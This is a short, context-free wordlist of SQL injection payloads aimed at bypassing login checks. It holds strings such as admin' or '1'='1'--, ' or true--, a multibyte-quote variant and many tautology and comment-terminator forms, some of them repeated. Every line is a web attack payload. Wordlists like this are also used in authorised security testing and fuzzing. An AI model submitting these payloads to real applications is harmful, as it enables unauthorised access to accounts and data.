%bf%27 or 1=1 --
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' or '1'='1'#
admin' or '1'=1
admin' or 1=1 or "='
admin' #
' ''='
['=']
' or 'true'='true
mod('=')
point('=')
eval('=')
' or '%0a'='%0a 
' or '%00'='%00 
`or` '=' 
+'='+ 
'=';
' or ''-'
" or ""-"
" or true--
' or true--
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
'OR(1=1)OR'a'=''
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
